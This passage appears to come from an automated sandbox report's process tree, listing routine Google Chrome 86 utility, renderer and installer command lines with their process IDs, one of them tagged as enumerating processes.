C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4684 /prefetch:82⤵PID:3124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:82⤵PID:344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5304 /prefetch:82⤵PID:152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5308 /prefetch:82⤵PID:3748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5548 /prefetch:82⤵PID:4916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5168 /prefetch:82⤵PID:4288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:82⤵PID:2312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5292 /prefetch:82⤵PID:984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5748 /prefetch:82⤵PID:4364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4124 /prefetch:82⤵PID:1388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4640 /prefetch:82⤵PID:2164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5828 /prefetch:82⤵PID:976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5824 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5808 /prefetch:82⤵PID:4108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:82⤵PID:4648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4260 /prefetch:82⤵PID:4520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6156 /prefetch:82⤵PID:3640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3460 /prefetch:82⤵PID:2160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6400 /prefetch:82⤵PID:4208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6516 /prefetch:82⤵PID:656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6264 /prefetch:82⤵PID:3288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6548 /prefetch:82⤵PID:180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7028 /prefetch:82⤵PID:3752
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:12⤵PID:3548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7148 /prefetch:82⤵PID:4860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7180 /prefetch:82⤵PID:3224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5428 /prefetch:82⤵PID:2240
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings2⤵PID:4300
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff70b0e7740,0x7ff70b0e7750,0x7ff70b0e77603⤵PID:652
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6588 /prefetch:82⤵PID:2516
-